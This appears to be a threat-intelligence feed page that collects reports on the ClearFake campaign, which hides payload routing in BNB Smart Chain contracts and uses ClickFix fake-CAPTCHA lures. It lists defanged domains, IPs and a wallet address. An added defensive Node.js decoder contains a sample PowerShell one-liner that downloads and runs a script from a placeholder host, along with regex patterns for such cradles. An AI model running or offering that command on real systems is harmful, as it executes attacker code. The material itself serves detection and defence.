Smart Contracts for C&C: How ClearFake Hid in Plain Sight on BSC Testnet

Pulse ID: 6a1ff48f519a80c0b86c0280
Pulse Link: https://otx.alienvault.com/pulse/6a1ff48f519a80c0b86c0280
Pulse Author: Tr1sa111
Created: 2026-06-03 09:31:59

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CandC #ClearFake #CyberSecurity #InfoSec #OTX #OpenThreatExchange #bot #Tr1sa111

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange

Smart Contracts for C&C: How ClearFake Hid in Plain Sight on BSC Testnet

Threat actors exploited the EtherHiding technique to store ClearFake payload routing instructions within smart contracts on the BNB Smart Chain testnet, creating an immutable command-and-control infrastructure that cannot be taken down. The attack began with injected JavaScript on a compromised Swiss website that queried blockchain contracts to deliver malicious payloads. Victims passing anti-analysis checks were fingerprinted by operating system and routed to platform-specific ClickFix social engineering overlays. The campaign simultaneously deployed SectopRAT, a .NET-based remote access trojan capable of browser session hijacking, and ACRStealer, a C++ infostealer targeting credentials and cryptocurrency wallets. An on-chain execution tracker confirmed each compromise in real time. Four smart contracts shared a single deployer wallet, with the oldest deployed nearly a year before analysis, indicating a long-running, actively maintained operation.

Pulse ID: 6a15ba2632bd7e246e9c1250
Pulse Link: https://otx.alienvault.com/pulse/6a15ba2632bd7e246e9c1250
Pulse Author: AlienVault
Created: 2026-05-26 15:20:06

#BlockChain #Browser #CandC #ClearFake #CyberSecurity #EtherHiding #InfoSec #InfoStealer #Java #JavaScript #NET #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SocialEngineering #Trojan #bot #cryptocurrency #AlienVault

Smart Contracts for C&C: How ClearFake Hid in Plain Sight on BSC Testnet

TrendAI™ Research analyzed an intrusion where threat actors used the EtherHiding technique to route ClearFake payload delivery through smart contracts on the BNB Smart Chain testnet. The attack chain ended with two simultaneously deployed stealers, SectopRAT and ACRStealer, alongside an on-chain execution tracker that confirmed each victim compromise in real time.

Trend Micro

.ru serious? 🇷🇺 ccTLD .ru had an unbelievable +3741% ⏫ in #botnet C&C domains, placing it #1 for the most abused ccTLD in the latter half of 2025. This activity can be attributed almost entirely to #clearfake, a malicious JavaScript framework.

Learn more in the Botnet Threat Update Jul - Dec 2025 ⤵️ ⤵️
https://www.spamhaus.org/resource-hub/botnet-c-c/botnet-threat-update-july-to-december-2025/

#ccTLD #BotnetCC #ThreatIntel

📢 Expel describes an evolution of ClearFake/ClickFix that hosts its payloads via smart contracts
📝 Source and context: Expel (blog, Marcus Hutchins, 20 Jan.
📖 cyberveille : https://cyberveille.ch/posts/2026-01-22-expel-decrit-une-evolution-de-clearfake-clickfix-qui-heberge-ses-charges-via-des-smart-contracts/
🌐 source : https://expel.com/blog/clearfake-new-lotl-techniques/
#ClearFake #EtherHiding #Cyberveille
Expel describes an evolution of ClearFake/ClickFix that hosts its payloads via smart contracts

Source and context: Expel (blog, Marcus Hutchins, 20 Jan. 2026) publishes a technical analysis of the ClearFake/ClickFix malware campaign, which is active on hundreds of compromised sites and focused on defence evasion. • What ClearFake does: a malicious JavaScript framework injected into hacked sites that displays a fake "ClickFix" CAPTCHA prompting the user to press Win+R and then paste and confirm a command, which triggers the infection. The JS chain is obfuscated and stages later payloads.

CyberVeille
ClearFake gets more evasive with new living off the land (LOTL) techniques
#Clearfake
https://expel.com/blog/clearfake-new-lotl-techniques/
ClearFake gets more evasive with new living off the land (LOTL) techniques

ClearFake's latest campaign uses fake CAPTCHAs and social engineering to trick victims into installing malware, and it's getting more evasive.

Expel

🚨 ClearFake Payload Delivery Domain Identified

A domain linked to ClearFake activity has been flagged delivering a js.clearfake payload with 100% confidence.

Quick Facts:

▪️Type: Domain
▪️Indicator: x5ust[.]windshift[.]ru
▪️Threat Type: Payload Delivery
▪️Malware: js.clearfake
▪️Date: 05 Dec 2025 // 00:17 UTC
▪️Tags: #ClearFake
▪️Reporter: threatcat_ch

URLScan:

▪️Verdict: 0
▪️Title: FASTPANEL
▪️Domain: https://urlscan.io/domain/x5ust.windshift.ru
▪️Result: https://urlscan.io/result/019aebe2-3c71-77ff-9e6d-5d225679e78a/
▪️Screenshot: https://urlscan.io/screenshots/019aebe2-3c71-77ff-9e6d-5d225679e78a.png

DNS / CT Data:

▪️A Records: 104.21.19.50, 172.67.185.61
▪️DNSlytics: https://dnslytics.com/domain/x5ust.windshift.ru

Related Intelligence:

▪️CRT: https://crt.sh/?q=x5ust.windshift.ru
▪️VirusTotal: https://www.virustotal.com/gui/domain/x5ust.windshift.ru

Here is our in-depth analysis of the latest #ClearFake variant using the Binance Smart Chain and two new ClickFix lures.

ClearFake is injected into thousands of compromised sites to distribute the #Emmenhtal Loader, #Lumma, #Rhadamanthys, and #Vidar.

CTI tip: monitor transactions from the Ethereum address 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA to identify new PowerShell commands distributed by ClearFake - and block/detect any traffic to malicious domains!

As usual, feedback is greatly appreciated!

https://infosec.exchange/@sekoia_io/114189330631698208

Sekoia.io (@sekoia_io@infosec.exchange)
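The CTI tip above (watch the operator wallet's transactions for new PowerShell commands) and the Trend Micro summary earlier on the page (a contract on the BSC testnet that the injected JavaScript queries for its routing instructions) both come down to reading one ABI-encoded string. The contract code is immutable, but the string it stores is not: the operator replaces it with a setter transaction, and the `input` of that transaction carries the new payload in the same ABI layout as the `eth_call` result, prefixed by a 4-byte function selector. That is why monitoring the wallet works. The Node.js script below is an added example, not code from ClearFake, Sekoia or Trend Micro; the function selector, the sample command and the RPC response are constructed here, and the PowerShell markers are a heuristic of my own rather than an indicator set from any of the linked reports.

```javascript
// Added example: decode the payload an EtherHiding-style contract serves.
// Not ClearFake's, Sekoia's or Trend Micro's code. Selector, sample command
// and RPC response are constructed for this demo.

// ABI "head/tail" layout of a single returned string:
//   word 0 = byte offset of the tail (32 for one argument)
//   word 1 = byte length of the string
//   then the UTF-8 bytes, zero-padded to a 32-byte boundary.
// A setter transaction's `input` has the same layout after a 4-byte selector.

function hexToBytes(hex) {
  const clean = hex.startsWith("0x") ? hex.slice(2) : hex;
  if (clean.length % 2 !== 0 || /[^0-9a-fA-F]/.test(clean)) {
    throw new Error("malformed hex data");
  }
  return Buffer.from(clean, "hex");
}

// Read one 32-byte word as an integer; reject values that cannot index the buffer,
// so hostile or truncated data throws instead of being misparsed.
function readWord(buf, pos) {
  if (pos + 32 > buf.length) throw new Error("truncated ABI data");
  const v = BigInt("0x" + buf.subarray(pos, pos + 32).toString("hex"));
  if (v > BigInt(buf.length)) throw new Error("ABI offset/length out of range");
  return Number(v);
}

function decodeAbiString(hexData, { hasSelector = false } = {}) {
  let buf = hexToBytes(hexData);
  if (hasSelector) buf = buf.subarray(4); // drop the function selector (tx input only)
  const offset = readWord(buf, 0);
  const length = readWord(buf, offset);
  const start = offset + 32;
  if (start + length > buf.length) throw new Error("string runs past buffer");
  return buf.subarray(start, start + length).toString("utf8");
}

// Inverse of decodeAbiString, used only to build the constructed samples below.
function encodeAbiString(text, selector = "") {
  const data = Buffer.from(text, "utf8");
  const word = (n) => n.toString(16).padStart(64, "0");
  const pad = "00".repeat((32 - (data.length % 32)) % 32);
  return "0x" + selector.replace(/^0x/, "") + word(32) + word(data.length) + data.toString("hex") + pad;
}

// Heuristic markers for a ClickFix-style PowerShell one-liner (my own list, not from the reports).
const PS_MARKERS = [
  ["powershell", /\bpowershell\b/i],
  ["hidden-window", /-w(?:indowstyle)?\s+hidden/i],
  ["iex", /\b(?:iex|invoke-expression)\b/i],
  ["download-cradle", /\b(?:irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b/i],
  ["base64-arg", /frombase64string|-enc(?:odedcommand)?\b/i],
  ["mshta", /\bmshta\b/i],
];

function classifyPayload(text) {
  const candidates = [text];
  // Some stages base64-wrap the command; inspect the decoded form as well.
  if (text.length % 4 === 0 && /^[A-Za-z0-9+/]+={0,2}$/.test(text)) {
    candidates.push(Buffer.from(text, "base64").toString("utf8"));
  }
  const markers = [];
  for (const candidate of candidates) {
    for (const [name, re] of PS_MARKERS) {
      if (re.test(candidate) && !markers.includes(name)) markers.push(name);
    }
  }
  return { suspicious: markers.length > 0, markers, decoded: candidates[candidates.length - 1] };
}

// Body of an eth_call JSON-RPC response against the contract's getter.
function analyseEthCallResponse(rpcJson) {
  const body = JSON.parse(rpcJson);
  if (body.error) throw new Error("RPC error: " + JSON.stringify(body.error));
  const payload = decodeAbiString(body.result);
  return { payload, ...classifyPayload(payload) };
}

// `input` of a transaction the operator wallet sent to the contract's setter.
function analyseSetterTx(txInput) {
  const payload = decodeAbiString(txInput, { hasSelector: true });
  return { payload, ...classifyPayload(payload) };
}

// Constructed sample (not a real IOC): the general shape of a ClickFix one-liner.
const SAMPLE_COMMAND = 'powershell -w hidden -c "iex (irm https://payload.example/x.ps1)"';
// Hypothetical selector; a real contract's selector comes from its ABI.
const SAMPLE_SELECTOR = "0x3d7403a3";
const SAMPLE_RPC_RESPONSE = JSON.stringify({ jsonrpc: "2.0", id: 1, result: encodeAbiString(SAMPLE_COMMAND) });
const SAMPLE_TX_INPUT = encodeAbiString(Buffer.from(SAMPLE_COMMAND).toString("base64"), SAMPLE_SELECTOR);

console.log(analyseEthCallResponse(SAMPLE_RPC_RESPONSE));
console.log(analyseSetterTx(SAMPLE_TX_INPUT));
```

Feed `analyseEthCallResponse` the body of an `eth_call` against the contract (public BSC RPC endpoints typically answer without an API key) and `analyseSetterTx` the `input` of each transaction the wallet in the tip sends; a setter call that decodes to a new command is a new ClickFix payload, and the domains it references can be blocklisted before the next compromised site serves it. The bounds checks in `readWord` matter because the data comes from an attacker-controlled contract: a bogus offset or length must fail closed rather than read garbage.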

TDR analysts published an analysis of the new #ClearFake variant that relies on compromised websites injected with the malicious JavaScript framework, the #EtherHiding technique, and the #ClickFix social engineering tactic. https://blog.sekoia.io/clearfakes-new-widespread-variant-increased-web3-exploitation-for-malware-delivery/

Infosec Exchange

ClearFake’s New Widespread Variant: Increased Web3 Exploitation for Malware Delivery

ClearFake spreads malware via compromised websites, using fake CAPTCHAs, JavaScript injections, and drive-by downloads.

Sekoia.io Blog

#ClearFake variant is now spreading #Rhadamanthys Stealer via #Emmenhtal Loader.

cc @sekoia_io

1. ClearFake framework is injected into compromised WordPress sites and relies on EtherHiding

2. The #ClickFix lure uses a fake Cloudflare Turnstile with unusual web traffic

3. Malicious PowerShell command is copied into the user's clipboard data to be executed in the Run dialog box

4. Downloading Emmenhtal from:

bytes.microstorage[.]shop (1st stage)
w66.discoverconicalcrouton[.]shop (2nd stage)

5. Further downloading and executing Rhadamanthys from:

bytes.microstorage[.]shop/code.bin (https://virustotal.com/gui/file/a88c153e1595f9d193b3f881ec77e0d7d338ae22c9f6e67ffdf39c3609fcdbf7)

6. Communicating with C2 at:

91.240.118[.]2:9769

Public analysis of the recent ClearFake variant: https://security.szustak.pl/etherhide/etherhide.html

VirusTotal